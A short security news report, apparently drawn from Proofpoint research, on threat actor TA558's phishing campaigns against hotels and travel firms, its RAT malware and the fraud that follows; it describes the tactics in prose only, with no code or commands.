This year, a hacker identified as TA558 has increased its activities, launching phishing attempts against several hotels and businesses in the hospitality and travel industries.
The threat actor gains access to the target systems, conducts surveillance, steals crucial data, and ultimately embezzles money from clients using a series of 15 different malware families, mostly remote access trojans (RATs). Proofpoint has recently noticed an increase in TA558 activity, which may be related to the tourism industry’s recovery following two years of COVID-19 limitations. TA558 has been active since 2018.
By 2022, TA558 had abandoned the use of documents with embedded macros in its phishing emails in favor of RAR and ISO file attachments or embedded URLs. In reaction to Microsoft’s decision to disable VBA and XL4 macros in Office, which hackers previously exploited for loading, dropping, and installing malware via infected documents, other threat actors have undergone similar alterations.
Written in English, Spanish, and Portuguese, the phishing emails that start the infection chain are sent to businesses in North America, Western Europe, and Latin America. The emails are about making reservations with the target company and pose as correspondence from conference planners, travel brokers, and other hard-to-reject sources. The URL in the message body, which is supposed to be a link for making a reservation, will deliver an ISO file to victims who click on it.
A batch file in the bundle starts a PowerShell script that ultimately downloads the RAT payload to the victim’s PC and sets up a scheduled job for persistence. AsyncRAT or Loda was the payload in the majority of the incidents Proofpoint saw this year. However, Revenge RAT, XtremeRAT, CaptureTela, and BluStealer were also used on a smaller scale. For instance, one 2022 campaign omitted just Revenge RAT and used QuickBooks invoice lures instead of hotel bookings.
After infecting hotel systems with RAT malware, TA558 penetrates the network further to steal customer information, store credit card information, and alter webpages that guests interact with to reroute funds for reservations. The Marino Boutique Hotel in Lisbon, Portugal, had its Booking.com account hacked in July 2022. The hacker stole €500,000 from unwary clients who had paid to book a stay for four days.
Although TA558’s participation in that incident was not established, it does match the threat actor’s TTPs and targeting range and, at the very least, illustrates how they may profit from their access to hotel systems. Other options for TA558 to gain money include selling or using the stolen credit card information, selling customer PII, extorting wealthy people, or giving ransomware groups access to the hotel’s network.